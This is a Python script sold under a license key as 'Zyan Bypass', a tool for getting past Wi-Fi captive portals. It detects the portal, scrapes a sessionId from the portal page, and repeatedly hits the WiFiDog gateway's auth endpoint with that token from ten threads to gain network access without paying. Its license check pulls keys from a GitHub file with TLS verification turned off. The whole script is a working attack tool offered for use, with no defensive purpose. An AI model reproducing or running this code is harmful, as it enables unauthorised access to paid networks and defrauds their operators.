import requests
import re
import urllib3
import time
import threading
import logging
import random
import sys
import datetime
from urllib.parse import urlparse, parse_qs, urljoin
from rich.console import Console
from rich.panel import Panel
from rich.align import Align
from rich.text import Text

# ===============================
# CONFIG & INITIALIZATION
# ===============================
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
console = Console()

PING_THREADS = 10
MIN_INTERVAL = 0.05
MAX_INTERVAL = 0.2

# အစ်ကို့ရဲ့ GitHub Link အမှန်
URL = "https://raw.githubusercontent.com/Zyan091/my-database/main/zyan-bypass"

BANNER = """
[bold #00FF00]
  ██████╗ ██╗   ██╗ █████╗ ███╗   ██╗
  ╚════██╗╚██╗ ██╔╝██╔══██╗████╗  ██║
   █████╔╝ ╚████╔╝ ███████║██╔██╗ ██║
  ██╔═══╝   ╚██╔╝  ██╔══██║██║╚██╗██║
  ███████╗   ██║   ██║  ██║██║ ╚████║
  ╚══════╝   ╚═╝   ╚═╝  ╚═╝╚═╝  ╚═══╝
    [#00FF00]Z Y A N   B Y P A S S[/#00FF00]
[/bold #00FF00]
"""

stop_event = threading.Event()

# ===============================
# UI FUNCTIONS
# ===============================
def display_wifi_logo():
    wifi_art = """
[bold cyan]      .     [/bold cyan]
[bold cyan]    . . .   [/bold cyan]
[bold cyan]  . . . . . [/bold cyan]
[bold cyan]      |     [/bold cyan]
    """
    console.print(Align.center(Panel(wifi_art, border_style="bold cyan", padding=(0, 0), expand=False)))
    console.print(Align.center(BANNER))
    console.print(Align.center("[bold cyan]ZYAN BYPASS PRO ENGINE v5.2[/bold cyan]"))
    console.print(Align.center("[bold #333333]━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[/bold #333333]\n"))

def simpler_hacker_typing(text, style="bold green"):
    prefix = "[bold #00FF00]>>> [/bold #00FF00]"
    console.print(prefix, end="")
    for char in text:
        console.print(Text(char, style=style), end="")
        sys.stdout.flush()
        time.sleep(0.02)
    console.print()

def hacking_status(message, duration=0.8):
    with console.status(f"[bold green]{message}[/bold green]", spinner="dots12", spinner_style="bold green"):
        time.sleep(duration + random.uniform(0.1, 0.4))

def success_fireworks():
    colors = ["red", "orange", "yellow", "green", "cyan", "magenta", "white"]
    for _ in range(3):
        for _ in range(8):
            fire = " " * random.randint(1, 40) + random.choice(["✨", "💥", "🔥", "⚡"]) + " " * random.randint(1, 10)
            console.print(Text(fire, style=random.choice(colors)))
            time.sleep(0.03)
    console.print(Align.center("[bold gold1]🎆 SYSTEM UNLOCKED 🎆[/bold gold1]"))
    time.sleep(0.2)

# ===============================
# LOGIC & LICENSE
# ===============================
def check_expiry(expiry_str):
    try:
        expiry_date = datetime.datetime.strptime(expiry_str.strip(), '%Y-%m-%d')
        current_date = datetime.datetime.now()
        if current_date > expiry_date:
            return False, expiry_date.strftime('%d-%b-%Y')
        return True, expiry_date.strftime('%d-%b-%Y')
    except:
        return True, "Lifetime"

def check_license_hacker_style():
    console.clear()
    display_wifi_logo()
    console.print(Align.center(Panel("[bold white]AWAITING AUTHORIZATION KEY[/bold white]", border_style="bold #00FF00", expand=False)))
    
    user_key = input("\n  [SECURITY_ACCESS] @Zyan_ ").strip()
    if not user_key:
        console.print("\n[bold red][!] ERROR: NULL_KEY[/bold red]")
        sys.exit()

    hacking_status("Connecting to GitHub Database...")
    try:
        response = requests.get(URL, timeout=10, verify=False)
        lines = [line.strip() for line in response.text.splitlines() if line.strip()]
        
        hacking_status("Decrypting Database...")
        for entry in lines:
            if "|" in entry:
                db_key, exp_date = entry.split("|")
            else:
                db_key, exp_date = entry, "None"

            if user_key == db_key.strip():
                is_active, date_label = check_expiry(exp_date)
                if is_active:
                    success_fireworks()
                    simpler_hacker_typing("ACCESS_GRANTED: AUTHENTICATION SUCCESS")
                    console.print(Align.center(f"[bold green]STATUS: ACTIVE | EXPIRY: {date_label}[/bold green]\n"))
                    return True
                else:
                    simpler_hacker_typing("ACCESS_DENIED: KEY_EXPIRED", style="bold red")
                    sys.exit()

        simpler_hacker_typing("ACCESS_DENIED: INVALID_KEY", style="bold red")
        sys.exit()

    except Exception as e:
        console.print(f"\n[bold red]📡 DATABASE ERROR: {e}[/bold red]")
        sys.exit()

# ===============================
# BYPASS ENGINE
# ===============================
def high_speed_ping(auth_link):
    session = requests.Session()
    while not stop_event.is_set():
        try:
            session.get(auth_link, timeout=5)
        except:
            break
        time.sleep(random.uniform(MIN_INTERVAL, MAX_INTERVAL))

def start_bypass_process():
    console.print("[bold yellow][*] Monitoring Network Packets...[/bold yellow]")
    while not stop_event.is_set():
        try:
            r = requests.get("http://connectivitycheck.gstatic.com/generate_204", allow_redirects=True, timeout=5)
            if r.status_code == 204:
                time.sleep(5)
                continue

            portal_url = r.url
            parsed_portal = urlparse(portal_url)
            
            r1 = requests.get(portal_url, verify=False, timeout=10)
            sid_match = re.search(r'sessionId=([a-zA-Z0-9]+)', r1.text)
            sid = sid_match.group(1) if sid_match else None

            if sid:
                params = parse_qs(parsed_portal.query)
                gw_addr = params.get('gw_address', ['192.168.60.1'])[0]
                gw_port = params.get('gw_port', ['2060'])[0]
                auth_link = f"http://{gw_addr}:{gw_port}/wifidog/auth?token={sid}"
                
                console.print(f"[bold green][+] SID Found: {sid} | Injecting...[/bold green]")
                for _ in range(PING_THREADS):
                    threading.Thread(target=high_speed_ping, args=(auth_link,), daemon=True).start()
            
            time.sleep(10)
        except Exception:
            time.sleep(5)

# ===============================
# MAIN EXECUTION
# ===============================
if __name__ == "__main__":
    if check_license_hacker_style():
        with console.status("[bold green]Injecting Packets...", spinner="shark"):
            time.sleep(2)
        console.print(Panel(Align.center("[bold white]🔥 ZYAN BYPASS ACTIVATED 🔥[/bold white]"), border_style="bold red", expand=False))
        try:
            start_bypass_process()
        except KeyboardInterrupt:
            stop_event.set()
            print("\n[!] Turbo Engine Shutdown...")
